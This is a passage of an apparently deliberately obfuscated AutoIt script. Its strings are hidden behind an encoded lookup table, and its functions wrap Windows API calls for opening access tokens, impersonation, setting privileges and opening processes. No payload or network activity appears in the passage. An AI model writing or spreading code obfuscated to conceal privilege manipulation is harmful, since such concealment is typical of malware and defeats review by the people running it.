  3912.         Global $ssa60d0400846 = 1
  3913.     EndIf
  3914.     If NOT a53d0703a12($a1f1531195d) Then Return SetError(Number($a211541484f), @extended, Number($a0615510e26))
  3915.     Local $a3e0e502f1b = DllCall($a1815616358, $a0015710c0e, $a0d15812e57, $a0a15915215, $a1f1531195d)
  3916.     If @error Then Return SetError(Number($a1515a15f0b), @extended, Number($a5215b1471a))
  3917.     Return $a3e0e502f1b[Number($a2015c1072e)]
  3918. EndFunc
  3919.  
  3920. Func a05d0502c03($a5082710732, $a1115d14a06)
  3921.     If NOT IsDeclared("SSA05D0502C03") Then
  3922.         Global $a2315e11731 = a2b00005424($os[3333]), $a3915f13346 = a2b00005424($os[3334]), $a3c25012043 = a2b00005424($os[3335]), $a0325110f48 = a2b00005424($os[3336]), $a0a25210d5d = a2b00005424($os[3337]), $a422531273b = a2b00005424($os[3338]), $a1525412a4b = a2b00005424($os[3339]), $a2b25513554 = a2b00005424($os[3340]), $a0325614c29 = a2b00005424($os[3341]), $a4425714c26 = a2b00005424($os[3342]), $a4125810d5c = a2b00005424($os[3343]), $a1925912827 = a2b00005424($os[3344]), $a5825a15f09 = a2b00005424($os[3345]), $a3025b1194e = a2b00005424($os[3346]), $a4025d14d23 = a2b00005424($os[3347]), $a1325e10350 = a2b00005424($os[3348]), $a1d25f10f5e = a2b00005424($os[3349]), $a2b35015d15 = a2b00005424($os[3350]), $a2535111f1c = a2b00005424($os[3351]), $a1835215948 = a2b00005424($os[3352]), $a4135313810 = a2b00005424($os[3353]), $a5135413644 = a2b00005424($os[3354]), $a5b35515863 = a2b00005424($os[3355]), $a0f35612330 = a2b00005424($os[3356]), $a5f35715312 = a2b00005424($os[3357]), $a6035810d2a = a2b00005424($os[3358]), $a5635913c62 = a2b00005424($os[3359]), $a4735a13317 = a2b00005424($os[3360]), $a5335b14839 = a2b00005424($os[3361])
  3923.         Global $ssa05d0502c03 = 1
  3924.     EndIf
  3925.     Local $a3e0e502f1b = DllCall($a2315e11731, $a3915f13346, $a3c25012043, $a0325110f48, $a5082710732, $a0a25210d5d, $a1115d14a06, $a422531273b, Number($a1525412a4b), $a2b25513554, Number($a0325614c29), $a4425714c26, Number($a4125810d5c))
  3926.     If @error OR NOT $a3e0e502f1b[Number($a1925912827)] Then Return SetError(Number($a5825a15f09), @extended, Number($a3025b1194e))
  3927.     Local $a5925c12e3c = $a3e0e502f1b[Number($a4025d14d23)]
  3928.     Local $a25bf105841 = DllStructCreate($a1325e10350 & $a5925c12e3c & $a1d25f10f5e)
  3929.     $a3e0e502f1b = DllCall($a2b35015d15, $a2535111f1c, $a1835215948, $a4135313810, $a5082710732, $a5135413644, $a1115d14a06, $a5b35515863, $a25bf105841, $a0f35612330, DllStructGetSize($a25bf105841), $a5f35715312, Number($a6035810d2a))
  3930.     If @error OR NOT $a3e0e502f1b[Number($a5635913c62)] Then Return SetError(Number($a4735a13317), @extended, Number($a5335b14839))
  3931.     Return $a25bf105841
  3932. EndFunc
  3933.  
  3934. Func a40d0601356($a1935c11c1d = $a2a99f04e1a)
  3935.     If NOT IsDeclared("SSA40D0601356") Then
  3936.         Global $a5435d1331a = a2b00005424($os[3362]), $a1d35e11456 = a2b00005424($os[3363]), $a0035f11254 = a2b00005424($os[3364]), $a5545013f00 = a2b00005424($os[3365]), $a3a45112d19 = a2b00005424($os[3366]), $a2f45212240 = a2b00005424($os[3367]), $a4d4531320e = a2b00005424($os[3368])
  3937.         Global $ssa40d0601356 = 1
  3938.     EndIf
  3939.     Local $a3e0e502f1b = DllCall($a5435d1331a, $a1d35e11456, $a0035f11254, $a5545013f00, $a1935c11c1d)
  3940.     If @error Then Return SetError(Number($a3a45112d19), @extended, False)
  3941.     Return NOT ($a3e0e502f1b[Number($a2f45212240)] = Number($a4d4531320e))
  3942. EndFunc
  3943.  
  3944. Func a53d0703a12($a1f1531195d)
  3945.     If NOT IsDeclared("SSA53D0703A12") Then
  3946.         Global $a4c45410b0f = a2b00005424($os[3369]), $a454551575d = a2b00005424($os[3370]), $a0045612f4a = a2b00005424($os[3371]), $a264571045b = a2b00005424($os[3372]), $a3245812c4d = a2b00005424($os[3373]), $a3345914a51 = a2b00005424($os[3374]), $a0545a11657 = a2b00005424($os[3375])
  3947.         Global $ssa53d0703a12 = 1
  3948.     EndIf
  3949.     Local $a3e0e502f1b = DllCall($a4c45410b0f, $a454551575d, $a0045612f4a, $a264571045b, $a1f1531195d)
  3950.     If @error Then Return SetError(Number($a3245812c4d), @extended, False)
  3951.     Return NOT ($a3e0e502f1b[Number($a3345914a51)] = Number($a0545a11657))
  3952. EndFunc
  3953.  
  3954. Func a16d0805626($a5305e15d03, $a1505f14b4e = "")
  3955.     If NOT IsDeclared("SSA16D0805626") Then
  3956.         Global $a3c45c12922 = a2b00005424($os[3376]), $a0345d14d17 = a2b00005424($os[3377]), $a5f45e1213f = a2b00005424($os[3378]), $a2145f14f55 = a2b00005424($os[3379]), $a3655010c04 = a2b00005424($os[3380]), $a5355114c1a = a2b00005424($os[3381]), $a2455213a18 = a2b00005424($os[3382]), $a4a5531165c = a2b00005424($os[3383]), $a0255410f30 = a2b00005424($os[3384]), $a0855513237 = a2b00005424($os[3385]), $a5e55614f1f = a2b00005424($os[3386]), $a5b55710254 = a2b00005424($os[3387]), $a4f55816029 = a2b00005424($os[3388]), $a365591571c = a2b00005424($os[3389]), $a4655a10542 = a2b00005424($os[3390]), $a3455b1560e = a2b00005424($os[3391]), $a4455c1124e = a2b00005424($os[3392]), $a0755d1373c = a2b00005424($os[3393]), $a3b55e1135f = a2b00005424($os[3394]), $a0c55f14a32 = a2b00005424($os[3395]), $a4065016103 = a2b00005424($os[3396]), $a176511133e = a2b00005424($os[3397])
  3957.         Global $ssa16d0805626 = 1
  3958.     EndIf
  3959.     Local $a0045b16345 = DllStructCreate($a3c45c12922)
  3960.     Local $a3e0e502f1b = DllCall($a0345d14d17, $a5f45e1213f, $a2145f14f55, $a3655010c04, $a1505f14b4e, $a5355114c1a, $a5305e15d03, $a2455213a18, $a0045b16345, $a4a5531165c, DllStructGetSize($a0045b16345), $a0255410f30, "", $a0855513237, DllStructGetSize($a0045b16345), $a5e55614f1f, Number($a5b55710254))
  3961.     If @error OR NOT $a3e0e502f1b[Number($a4f55816029)] Then Return SetError(Number($a365591571c), @extended, Number($a4655a10542))
  3962.     Local $a1f15011a22[Number($a3455b1560e)]
  3963.     $a1f15011a22[Number($a4455c1124e)] = a18e0004849(DllStructGetPtr($a0045b16345, $a0755d1373c))
  3964.     $a1f15011a22[Number($a3b55e1135f)] = $a3e0e502f1b[Number($a0c55f14a32)]
  3965.     $a1f15011a22[Number($a4065016103)] = $a3e0e502f1b[Number($a176511133e)]
  3966.     Return $a1f15011a22
  3967. EndFunc
  3968.  
  3969. Func a3ed0901056($a4f65215f05, $a1505f14b4e = "")
  3970.     If NOT IsDeclared("SSA3ED0901056") Then
  3971.         Global $a3e65310f11 = a2b00005424($os[3398]), $a0265415e1c = a2b00005424($os[3399]), $a196551070b = a2b00005424($os[3400]), $a4265711a43 = a2b00005424($os[3401]), $a0c65810c5e = a2b00005424($os[3402]), $a4765913835 = a2b00005424($os[3403]), $a3f65a15328 = a2b00005424($os[3404]), $a1f65b1083c = a2b00005424($os[3405]), $a4565c10854 = a2b00005424($os[3406]), $a1165d14413 = a2b00005424($os[3407]), $a5665e12d51 = a2b00005424($os[3408]), $a6265f1120d = a2b00005424($os[3409]), $a4b75011d4f = a2b00005424($os[3410]), $a5375110245 = a2b00005424($os[3411]), $a1575210a3d = a2b00005424($os[3412]), $a3e75310b15 = a2b00005424($os[3413]), $a4675413c18 = a2b00005424($os[3414]), $a1a7551025b = a2b00005424($os[3415]), $a2d7561230c = a2b00005424($os[3416]), $a5075713050 = a2b00005424($os[3417]), $a3175815c07 = a2b00005424($os[3418]), $a1675910353 = a2b00005424($os[3419]), $a5075a13c47 = a2b00005424($os[3420]), $a1375b11c47 = a2b00005424($os[3421]), $a3175c13907 = a2b00005424($os[3422]), $a2175d1434c = a2b00005424($os[3423]), $a2675e1573f = a2b00005424($os[3424])
  3972.         Global $ssa3ed0901056 = 1
  3973.     EndIf
  3974.     Local $a1f1531195d, $a1f15011a22[Number($a3e65310f11)]
  3975.     If IsString($a4f65215f05) Then
  3976.         $a1f1531195d = a27e0201150($a4f65215f05)
  3977.     Else
  3978.         $a1f1531195d = $a4f65215f05
  3979.     EndIf
  3980.     If NOT a53d0703a12($a1f1531195d) Then Return SetError(Number($a0265415e1c), @extended, Number($a196551070b))
  3981.     Local $a2465612c2d = $a4265711a43
  3982.     If $a1505f14b4e Then $a2465612c2d = $a0c65810c5e
  3983.     Local $a3e0e502f1b = DllCall($a4765913835, $a3f65a15328, $a1f65b1083c, $a2465612c2d, $a1505f14b4e, $a4565c10854, $a1f1531195d, $a1165d14413, "", $a5665e12d51, Number($a6265f1120d), $a4b75011d4f, "", $a5375110245, Number($a1575210a3d), $a3e75310b15, Number($a4675413c18))
  3984.     If @error OR NOT $a3e0e502f1b[Number($a1a7551025b)] Then Return SetError(Number($a2d7561230c), @extended, Number($a5075713050))
  3985.     Local $a1f15011a22[Number($a3175815c07)]
  3986.     $a1f15011a22[Number($a1675910353)] = $a3e0e502f1b[Number($a5075a13c47)]
  3987.     $a1f15011a22[Number($a1375b11c47)] = $a3e0e502f1b[Number($a3175c13907)]
  3988.     $a1f15011a22[Number($a2175d1434c)] = $a3e0e502f1b[Number($a2675e1573f)]
  3989.     Return $a1f15011a22
  3990. EndFunc
  3991.  
  3992. Func a4fd0a02417($a1505f14b4e, $a00bc705e51)
  3993.     If NOT IsDeclared("SSA4FD0A02417") Then
  3994.         Global $a3675f1563c = a2b00005424($os[3425]), $a1185010a27 = a2b00005424($os[3426]), $a358511472d = a2b00005424($os[3427]), $a1685212954 = a2b00005424($os[3428]), $a0c85315c2c = a2b00005424($os[3429]), $a6085412c4b = a2b00005424($os[3430]), $a4185512327 = a2b00005424($os[3431]), $a4385611500 = a2b00005424($os[3432]), $a3085710440 = a2b00005424($os[3433]), $a0185815b29 = a2b00005424($os[3434]), $a4b85915c3e = a2b00005424($os[3435])
  3995.         Global $ssa4fd0a02417 = 1
  3996.     EndIf
  3997.     Local $a3e0e502f1b = DllCall($a3675f1563c, $a1185010a27, $a358511472d, $a1685212954, $a1505f14b4e, $a0c85315c2c, $a00bc705e51, $a6085412c4b, Number($a4185512327))
  3998.     If @error OR NOT $a3e0e502f1b[Number($a4385611500)] Then Return SetError(Number($a3085710440), @extended, Number($a0185815b29))
  3999.     Return $a3e0e502f1b[Number($a4b85915c3e)]
  4000. EndFunc
  4001.  
  4002. Func a51d0b02831($a598f105931, $a49cc60131c)
  4003.     If NOT IsDeclared("SSA51D0B02831") Then
  4004.         Global $a2585a12923 = a2b00005424($os[3436]), $a3e85b13521 = a2b00005424($os[3437]), $a4085c1205e = a2b00005424($os[3438]), $a4585d14b19 = a2b00005424($os[3439]), $a6385e14902 = a2b00005424($os[3440]), $a2485f14546 = a2b00005424($os[3441]), $a1f95014533 = a2b00005424($os[3442]), $a0595113427 = a2b00005424($os[3443]), $a4295215104 = a2b00005424($os[3444]), $a4395313732 = a2b00005424($os[3445]), $a0895413110 = a2b00005424($os[3446])
  4005.         Global $ssa51d0b02831 = 1
  4006.     EndIf
  4007.     Local $a3e0e502f1b = DllCall($a2585a12923, $a3e85b13521, $a4085c1205e, $a4585d14b19, $a598f105931, $a6385e14902, $a49cc60131c, $a2485f14546, Number($a1f95014533))
  4008.     If @error OR NOT $a3e0e502f1b[Number($a0595113427)] Then Return SetError(Number($a4295215104), @extended, Number($a4395313732))
  4009.     Return $a3e0e502f1b[Number($a0895413110)]
  4010. EndFunc
  4011.  
  4012. Func a25d0c0084f($a49cc60131c, $a2f95514f4e = 0, $a4d95613120 = False)
  4013.     If NOT IsDeclared("SSA25D0C0084F") Then
  4014.         Global $a2b95710a05 = a2b00005424($os[3447]), $a4b9581262b = a2b00005424($os[3448]), $a629591255f = a2b00005424($os[3449]), $a1d95a1425a = a2b00005424($os[3450]), $a4c95b13f01 = a2b00005424($os[3451]), $a4b95c11650 = a2b00005424($os[3452]), $a4595d10a57 = a2b00005424($os[3453]), $a3495e14221 = a2b00005424($os[3454]), $a0e95f11628 = a2b00005424($os[3455]), $a2fa5012f34 = a2b00005424($os[3456]), $a10a511311e = a2b00005424($os[3457]), $a1ca5213043 = a2b00005424($os[3458]), $a4ba5313b40 = a2b00005424($os[3459]), $a17a5411618 = a2b00005424($os[3460]), $a2ea5510d3b = a2b00005424($os[3461])
  4015.         Global $ssa25d0c0084f = 1
  4016.     EndIf
  4017.     If $a2f95514f4e = Number($a2b95710a05) Then $a2f95514f4e = a1b4080085d()
  4018.     If @error Then Return SetError(Number($a4b9581262b), @extended, Number($a629591255f))
  4019.     Local $a3e0e502f1b = DllCall($a1d95a1425a, $a4c95b13f01, $a4b95c11650, $a4595d10a57, $a2f95514f4e, $a3495e14221, $a49cc60131c, $a0e95f11628, $a4d95613120, $a2fa5012f34, Number($a10a511311e))
  4020.     If @error OR NOT $a3e0e502f1b[Number($a1ca5213043)] Then Return SetError(Number($a4ba5313b40), @extended, Number($a17a5411618))
  4021.     Return $a3e0e502f1b[Number($a2ea5510d3b)]
  4022. EndFunc
  4023.  
  4024. Func a0bd0d04a04($a49cc60131c, $a2f95514f4e = 0, $a4d95613120 = False)
  4025.     If NOT IsDeclared("SSA0BD0D04A04") Then
  4026.         Global $a0fa561453c = a2b00005424($os[3462]), $a1fa5714c54 = a2b00005424($os[3463]), $a30a5811d58 = a2b00005424($os[3464]), $a42a5915a1d = a2b00005424($os[3465]), $a44a5a10626 = a2b00005424($os[3466]), $a28a5b14417 = a2b00005424($os[3467]), $a1aa5c13925 = a2b00005424($os[3468]), $a5fa5d10d57 = a2b00005424($os[3469])
  4027.         Global $ssa0bd0d04a04 = 1
  4028.     EndIf
  4029.     Local $a5082710732 = a25d0c0084f($a49cc60131c, $a2f95514f4e, $a4d95613120)
  4030.     If $a5082710732 = Number($a0fa561453c) Then
  4031.         If a3e00102e0a() <> $a4d49103a0a Then Return SetError(Number($a1fa5714c54), a3e00102e0a(), Number($a30a5811d58))
  4032.         If NOT a40d0601356() Then Return SetError(Number($a42a5915a1d), a3e00102e0a(), Number($a44a5a10626))
  4033.         $a5082710732 = a25d0c0084f($a49cc60131c, $a2f95514f4e, $a4d95613120)
  4034.         If $a5082710732 = Number($a28a5b14417) Then Return SetError(Number($a1aa5c13925), a3e00102e0a(), Number($a5fa5d10d57))
  4035.     EndIf
  4036.     Return $a5082710732
  4037. EndFunc
  4038.  
  4039. Func a2fd0e03a10($a5082710732, $a0ea5e13f32, $a331e502113)
  4040.     If NOT IsDeclared("SSA2FD0E03A10") Then
  4041.         Global $a25b5016226 = a2b00005424($os[3470]), $a5ab5113461 = a2b00005424($os[3471]), $a44b5712607 = a2b00005424($os[3472]), $a19b5815b0f = a2b00005424($os[3473]), $a3bb591412b = a2b00005424($os[3474]), $a21b5a1324f = a2b00005424($os[3475]), $a19b5b16135 = a2b00005424($os[3476]), $a4bb5c10759 = a2b00005424($os[3477]), $a23b5d11557 = a2b00005424($os[3478]), $a62b5e11411 = a2b00005424($os[3479]), $a3fb5f12028 = a2b00005424($os[3480]), $a3ac501070f = a2b00005424($os[3481]), $a3bc5115f27 = a2b00005424($os[3482])
  4042.         Global $ssa2fd0e03a10 = 1
  4043.     EndIf
  4044.     Local $a56a5f11a18 = a4fd0a02417("", $a0ea5e13f32)
  4045.     If $a56a5f11a18 = Number($a25b5016226) Then Return SetError(Number($a5ab5113461), @extended, False)
  4046.     Local $a05b5210858 = DllStructCreate($a2bd800142c)
  4047.     Local $a2fb5310345 = DllStructGetSize($a05b5210858)
  4048.     Local $a3eb5415242 = DllStructCreate($a2bd800142c)
  4049.     Local $a04b5515c19 = DllStructGetSize($a3eb5415242)
  4050.     Local $a42b561085a = DllStructCreate($a44b5712607)
  4051.     DllStructSetData($a05b5210858, $a19b5815b0f, Number($a3bb591412b))
  4052.     DllStructSetData($a05b5210858, $a21b5a1324f, $a56a5f11a18)
  4053.     If NOT a26d0003e3b($a5082710732, False, $a05b5210858, $a2fb5310345, $a3eb5415242, $a42b561085a) Then Return SetError(Number($a19b5b16135), @error, False)
  4054.     DllStructSetData($a3eb5415242, $a4bb5c10759, Number($a23b5d11557))
  4055.     DllStructSetData($a3eb5415242, $a62b5e11411, $a56a5f11a18)
  4056.     Local $a61cc802d36 = DllStructGetData($a3eb5415242, $a3fb5f12028)
  4057.     If $a331e502113 Then
  4058.         $a61cc802d36 = BitOR($a61cc802d36, $a2a89100625)
  4059.     Else
  4060.         $a61cc802d36 = BitAND($a61cc802d36, BitNOT($a2a89100625))
  4061.     EndIf
  4062.     DllStructSetData($a3eb5415242, $a3ac501070f, $a61cc802d36)
  4063.     If NOT a26d0003e3b($a5082710732, False, $a3eb5415242, $a04b5515c19, $a05b5210858, $a42b561085a) Then Return SetError(Number($a3bc5115f27), @error, False)
  4064.     Return True
  4065. EndFunc
  4066.  
  4067. Func a07d0f02601($a5082710732, $a12c5213d22, $a3dc5313541, $a55c5415405)
  4068.     If NOT IsDeclared("SSA07D0F02601") Then
  4069.         Global $a27c5515b5d = a2b00005424($os[3483]), $a19c5615003 = a2b00005424($os[3484]), $a16c5712a2a = a2b00005424($os[3485]), $a42c5815b30 = a2b00005424($os[3486]), $a51c5915e40 = a2b00005424($os[3487]), $a02c5a15032 = a2b00005424($os[3488]), $a23c5b15e40 = a2b00005424($os[3489]), $a30c5c11916 = a2b00005424($os[3490]), $a32c5d13c4f = a2b00005424($os[3491])
  4070.         Global $ssa07d0f02601 = 1
  4071.     EndIf
  4072.     Local $a3e0e502f1b = DllCall($a27c5515b5d, $a19c5615003, $a16c5712a2a, $a42c5815b30, $a5082710732, $a51c5915e40, $a12c5213d22, $a02c5a15032, $a3dc5313541, $a23c5b15e40, $a55c5415405)
  4073.     If @error OR NOT $a3e0e502f1b[Number($a30c5c11916)] Then Return SetError(Number($a32c5d13c4f), @extended, False)
  4074.     Return True
  4075. EndFunc
  4076.  
  4077. Func a18e0004849($a1f1531195d)
  4078.     If NOT IsDeclared("SSA18E0004849") Then
  4079.         Global $a40c5e15e4f = a2b00005424($os[3492]), $a0ec5f1194d = a2b00005424($os[3493]), $a51d5014709 = a2b00005424($os[3494]), $a3dd5115a56 = a2b00005424($os[3495]), $a10d5214e1c = a2b00005424($os[3496]), $a4ed5310827 = a2b00005424($os[3497]), $a2ed5412161 = a2b00005424($os[3498]), $a48d551400f = a2b00005424($os[3499]), $a08d5615d1f = a2b00005424($os[3500]), $a15d5715355 = a2b00005424($os[3501]), $a5fd5913547 = a2b00005424($os[3502]), $a0fd5b14a4c = a2b00005424($os[3503]), $a17d5c14a15 = a2b00005424($os[3504]), $a4ad5d11958 = a2b00005424($os[3505]), $a0cd5e11c19 = a2b00005424($os[3506])
  4080.         Global $ssa18e0004849 = 1
  4081.     EndIf
  4082.     If NOT a53d0703a12($a1f1531195d) Then Return SetError(Number($a40c5e15e4f), Number($a0ec5f1194d), "")
  4083.     Local $a3e0e502f1b = DllCall($a51d5014709, $a3dd5115a56, $a10d5214e1c, $a4ed5310827, $a1f1531195d, $a2ed5412161, Number($a48d551400f))
  4084.     If @error OR NOT $a3e0e502f1b[Number($a08d5615d1f)] Then Return SetError(Number($a15d5715355), @extended, "")
  4085.     Local $a3ed581545b = $a3e0e502f1b[Number($a5fd5913547)]
  4086.     Local $a36d5a10c2b = DllStructGetData(DllStructCreate($a0fd5b14a4c & a1fc000520d($a3ed581545b) + Number($a17d5c14a15) & $a4ad5d11958, $a3ed581545b), $a0cd5e11c19)
  4087.     a5380504f5c($a3ed581545b)
  4088.     Return $a36d5a10c2b
  4089. EndFunc
  4090.  
  4091. Func a39e0105b50($a2cc1013022)
  4092.     If NOT IsDeclared("SSA39E0105B50") Then
  4093.         Global $a5cd5f1585e = a2b00005424($os[3507]), $a31e5012924 = a2b00005424($os[3508]), $a4ce5113418 = a2b00005424($os[3509]), $a17e5211322 = a2b00005424($os[3510]), $a2ce5312c56 = a2b00005424($os[3511]), $a61e5412909 = a2b00005424($os[3512]), $a49e5513412 = a2b00005424($os[3513]), $a50e5614e60 = a2b00005424($os[3514]), $a1ce5716004 = a2b00005424($os[3515]), $a22e5814446 = a2b00005424($os[3516]), $a55e5910c2b = a2b00005424($os[3517])
  4094.         Global $ssa39e0105b50 = 1
  4095.     EndIf
  4096.     Switch $a2cc1013022
  4097.         Case $a2b1a104c54
  4098.             Return $a5cd5f1585e
  4099.         Case $a501a302631
  4100.             Return $a31e5012924
  4101.         Case $a4d1a403711
  4102.             Return $a4ce5113418
  4103.         Case $a1e1a500b5f
  4104.             Return $a17e5211322
  4105.         Case $a271a60375c
  4106.             Return $a2ce5312c56
  4107.         Case $a521a702528
  4108.             Return $a61e5412909
  4109.         Case $a621a80303a
  4110.             Return $a49e5513412
  4111.         Case $a401a904247
  4112.             Return $a50e5614e60
  4113.         Case $a301aa05a62
  4114.             Return $a1ce5716004
  4115.         Case $a0e1ab01860
  4116.             Return $a22e5814446
  4117.         Case Else
  4118.             Return $a55e5910c2b
  4119.     EndSwitch
  4120. EndFunc
  4121.  
  4122. Func a27e0201150($a36d5a10c2b)
  4123.     If NOT IsDeclared("SSA27E0201150") Then
  4124.         Global $a26e5a10730 = a2b00005424($os[3518]), $a61e5b1275d = a2b00005424($os[3519]), $a56e5c1362c = a2b00005424($os[3520]), $a49e5d1481f = a2b00005424($os[3521]), $a58e5e11531 = a2b00005424($os[3522]), $a13e5f13419 = a2b00005424($os[3523]), $a1df501135b = a2b00005424($os[3524]), $a2df5112f20 = a2b00005424($os[3525]), $a39f5211f59 = a2b00005424($os[3526]), $a5af531275f = a2b00005424($os[3527]), $a55f5412e0e = a2b00005424($os[3528]), $a17f5511608 = a2b00005424($os[3529]), $a5bf5713d08 = a2b00005424($os[3530]), $a0cf581500b = a2b00005424($os[3531]), $a01f5915059 = a2b00005424($os[3532]), $a16f5a14344 = a2b00005424($os[3533])
  4125.         Global $ssa27e0201150 = 1
  4126.     EndIf
  4127.     Local $a3e0e502f1b = DllCall($a26e5a10730, $a61e5b1275d, $a56e5c1362c, $a49e5d1481f, $a36d5a10c2b, $a58e5e11531, Number($a13e5f13419))
  4128.     If @error OR NOT $a3e0e502f1b[Number($a1df501135b)] Then Return SetError(Number($a2df5112f20), @extended, Number($a39f5211f59))
  4129.     Local $a1f1531195d = $a3e0e502f1b[Number($a5af531275f)]
  4130.     Local $a25bf105841 = DllStructCreate($a55f5412e0e & a60d0400846($a1f1531195d) & $a17f5511608, $a1f1531195d)
  4131.     Local $a47f5613501 = DllStructCreate($a5bf5713d08 & DllStructGetSize($a25bf105841) & $a0cf581500b)
  4132.     DllStructSetData($a47f5613501, $a01f5915059, DllStructGetData($a25bf105841, $a16f5a14344))
  4133.     a5380504f5c($a1f1531195d)
  4134.     Return $a47f5613501
  4135. EndFunc
  4136.  
  4137. Global Const $a59f5b1111f = $a40f5c13a28
  4138.  
  4139. Func a40e030183e(ByRef $a3ef5d11a22)
  4140.     If NOT IsDeclared("SSA40E030183E") Then
  4141.         Global $a4af5f12621 = a2b00005424($os[3535]), $a3c06012041 = a2b00005424($os[3536]), $a1b06213917 = a2b00005424($os[3537]), $a1206310f2d = a2b00005424($os[3538]), $a4c0641625d = a2b00005424($os[3539]), $a390651622d = a2b00005424($os[3540]), $a1506615560 = a2b00005424($os[3541])
  4142.         Global $ssa40e030183e = 1
  4143.     EndIf
  4144.     Local $a04f5e13234 = DllStructGetData($a3ef5d11a22, $a4af5f12621)
  4145.     Local $a598f105931 = DllStructGetData($a3ef5d11a22, $a3c06012041)
  4146.     Local $a1006112f5a = a2ef0003b42($a598f105931, $a04f5e13234, Number($a1b06213917), $a4028a05e3e)
  4147.     DllCall($a1206310f2d, $a4c0641625d, $a390651622d, $a1506615560, $a598f105931)
  4148.     If @error Then Return SetError(@error, @extended, False)
  4149.     Return $a1006112f5a
  4150. EndFunc
  4151.  
  4152. Func a20e0405146($a5360a1142c, $a103d00243d = 0)
  4153.     If NOT IsDeclared("SSA20E0405146") Then
  4154.         Global $a4b0671021e = a2b00005424($os[3542]), $a2c06812a55 = a2b00005424($os[3543]), $a3306913a3a = a2b00005424($os[3544]), $a4206a15902 = a2b00005424($os[3545]), $a1906b1443c = a2b00005424($os[3546]), $a1506c15044 = a2b00005424($os[3547]), $a3206d1435e = a2b00005424($os[3548])
  4155.         Global $ssa20e0405146 = 1
  4156.     EndIf
  4157.     Local $a505a20190d = DllCall($a4b0671021e, $a2c06812a55, $a3306913a3a, $a4206a15902, $a103d00243d, $a1906b1443c, $a5360a1142c)
  4158.     If @error Then Return SetError(@error, @extended, Number($a1506c15044))
  4159.     Return $a505a20190d[Number($a3206d1435e)]
  4160. EndFunc
  4161.  
  4162. Func a24e0500a5c($a40f1712160)
  4163.     If NOT IsDeclared("SSA24E0500A5C") Then
  4164.         Global $a1006e13242 = a2b00005424($os[3549]), $a4006f1474f = a2b00005424($os[3550]), $a5216012e38 = a2b00005424($os[3551]), $a1616114515 = a2b00005424($os[3552]), $a421621455a = a2b00005424($os[3553])
  4165.         Global $ssa24e0500a5c = 1
  4166.     EndIf
  4167.     Local $a505a20190d = DllCall($a1006e13242, $a4006f1474f, $a5216012e38, $a1616114515, $a40f1712160)
  4168.     If @error Then Return SetError(@error, @extended, False)
  4169.     Return $a505a20190d[Number($a421621455a)]
  4170. EndFunc
  4171.  
  4172. Func a26e0600904($a40f1712160)
  4173.     If NOT IsDeclared("SSA26E0600904") Then
  4174.         Global $a0816314053 = a2b00005424($os[3554]), $a4816410561 = a2b00005424($os[3555]), $a0416512d20 = a2b00005424($os[3556]), $a0116614b29 = a2b00005424($os[3557]), $a1a16710627 = a2b00005424($os[3558]), $a5e16812d53 = a2b00005424($os[3559])
  4175.         Global $ssa26e0600904 = 1
  4176.     EndIf
  4177.     Local $a505a20190d = DllCall($a0816314053, $a4816410561, $a0416512d20, $a0116614b29, $a40f1712160)
  4178.     If @error Then Return SetError(@error, @extended, Number($a1a16710627))
  4179.     Return $a505a20190d[Number($a5e16812d53)]
  4180. EndFunc
  4181.  
  4182. Func a35e070561d($a40f1712160)
  4183.     If NOT IsDeclared("SSA35E070561D") Then
  4184.         Global $a4c16913b34 = a2b00005424($os[3560]), $a1d16a14d5c = a2b00005424($os[3561]), $a2216b13f06 = a2b00005424($os[3562]), $a6016c1352e = a2b00005424($os[3563]), $a2016d10136 = a2b00005424($os[3564]), $a5f16e10557 = a2b00005424($os[3565])
  4185.         Global $ssa35e070561d = 1
  4186.     EndIf
  4187.     Local $a505a20190d = DllCall($a4c16913b34, $a1d16a14d5c, $a2216b13f06, $a6016c1352e, $a40f1712160)
  4188.     If @error Then Return SetError(@error, @extended, Number($a2016d10136))
  4189.     Return $a505a20190d[Number($a5f16e10557)]
  4190. EndFunc
  4191.  
  4192. Func a09e080233e($a40f1712160)
  4193.     If NOT IsDeclared("SSA09E080233E") Then
  4194.         Global $a4916f12936 = a2b00005424($os[3566]), $a3326011459 = a2b00005424($os[3567]), $a142611335a = a2b00005424($os[3568]), $a3826211246 = a2b00005424($os[3569]), $a1a26312962 = a2b00005424($os[3570]), $a1a26413248 = a2b00005424($os[3571])
  4195.         Global $ssa09e080233e = 1
  4196.     EndIf
  4197.     Local $a505a20190d = DllCall($a4916f12936, $a3326011459, $a142611335a, $a3826211246, $a40f1712160)
  4198.     If @error Then Return SetError(@error, @extended, Number($a1a26312962))
  4199.     Return $a505a20190d[Number($a1a26413248)]
  4200. EndFunc
  4201.  
  4202. Func a0be0905b36($a3eca000d54, $a11de601b14, ByRef $a3ef5d11a22)
  4203.     If NOT IsDeclared("SSA0BE0905B36") Then
  4204.         Global $a2926510126 = a2b00005424($os[3572]), $a4426614160 = a2b00005424($os[3573]), $a4f26714662 = a2b00005424($os[3574]), $a3a26813a4c = a2b00005424($os[3575]), $a1626911d37 = a2b00005424($os[3576]), $a6326a15237 = a2b00005424($os[3577]), $a6126b12256 = a2b00005424($os[3578]), $a1b26c14909 = a2b00005424($os[3579]), $a3f26d14b49 = a2b00005424($os[3580]), $a0526e1374d = a2b00005424($os[3581]), $a1026f1390b = a2b00005424($os[3582]), $a0236011122 = a2b00005424($os[3583]), $a5636216023 = a2b00005424($os[3584]), $a4236315d5d = a2b00005424($os[3585]), $a3436414e46 = a2b00005424($os[3586]), $a0f36512f02 = a2b00005424($os[3587]), $a453661400e = a2b00005424($os[3588]), $a4d36712f1f = a2b00005424($os[3589]), $a1c36812637 = a2b00005424($os[3590]), $a1836915632 = a2b00005424($os[3591])
  4205.         Global $ssa0be0905b36 = 1
  4206.     EndIf
  4207.     Local $a505a20190d = DllCall($a2926510126, $a4426614160, $a4f26714662, $a3a26813a4c, $a3eca000d54, $a1626911d37, Number($a6326a15237))
  4208.     If @error Then Return SetError(@error, @extended, Number($a6126b12256))
  4209.     Local $a62cbf0122a = $a505a20190d[Number($a1b26c14909)]
  4210.     If $a62cbf0122a = Number($a3f26d14b49) Then Return SetError(Number($a0526e1374d), Number($a1026f1390b), Number($a0236011122))
  4211.     Local $a49cc60131c = BitOR($a5e29d0245b, $a3229f03b38, $a0739101a62)
  4212.     Local $a598f105931 = a63f0101354($a49cc60131c, False, $a62cbf0122a, True)
  4213.     Local $a4d36111d0a = BitOR($a2518204004, $a1618002619)
  4214.     Local $a04f5e13234 = a1fe0e00007($a598f105931, Number($a5636216023), $a11de601b14, $a4d36111d0a, $a3018c01c62)
  4215.     If $a04f5e13234 = Number($a4236315d5d) Then Return SetError(Number($a3436414e46), Number($a0f36512f02), Number($a453661400e))
